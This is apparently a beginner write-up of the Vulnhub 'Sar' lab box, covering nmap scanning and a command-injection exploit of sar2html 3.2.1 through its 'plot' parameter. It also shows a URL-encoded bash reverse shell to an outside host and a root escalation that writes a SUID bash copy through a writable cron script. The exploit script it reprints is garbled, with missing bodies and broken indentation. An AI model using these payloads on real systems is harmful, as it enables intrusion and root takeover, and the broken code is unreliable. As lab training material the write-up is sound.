DifficultyRelease DateAuthor
Beginner15 Feb 2020Love


In this box there’s only one port open that is running a vulnerable version of sar2html that we take advantage of to get a low priv shell. For privilege escalation there was a cron job running as root that was running a script we could write in.



Nmap scan report for
Host is up (0.000040s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:48:00:F5 (Oracle VirtualBox virtual NIC)


80 (HTTP)

Using nmap scripts we see the existence of robots.txt

Nmap scan report for
Host is up (0.00042s latency).

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

From this we discover sar2HTML.

Visiting this directory I get the version of sar2html as 3.2.1.

Checking on searchsploit, a remote command execution vulnerability exists for this version.

searchsploit sar2html

Shell as user

By executing the python script that exploits this RCE vulnerability, we are able to get a reverse shell.

script url: https://www.exploit-db.com/exploits/49344

~/Vulnhub/Sar1  python3 49344.py

Enter The url =>
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command => /bin/bash+-c+'/bin/bash+-i+>%26+/dev/tcp/>%261'

Performing some enumeration to achieve some privilege escalation to root or lateral movement to other users I found a cron job running as root.

While we can’t write to this file, the script being executed inside it is writeable.

Shell as root

By writing into write.sh using vi, we can escalate our privileges.


cp /bin/bash /var/www/html/suidbash
chmod u+s /var/www/html/suidbash

This will create a copy of the bash binary and add suid permissions to it.

Once the cron job executes and creates the binary we can achieve a root shell and read all the flags.


Understanding the exploit script and perform the exploit manually.

To my surprise, this exploit code was created by a good friend of mine, Musyoka Ian.

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
        out = re.findall("<option value=(.*?)>", output.text)
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()

According to the script the vulnerable parameter is plot and simply takes in our command and executes it.

When interacting with the application you can select OS, when you pick one the plot parameter is used.

Here we can inject the command we want and execute shell commands. The OS option doesn’t matter, anything after the semi-colon ; will be executed. For the reverse shell command remember to url encode special chars like I did above

Shoutout to Musyoka Ian, you can read his blog linked below. He does cool writeups on challenges as well.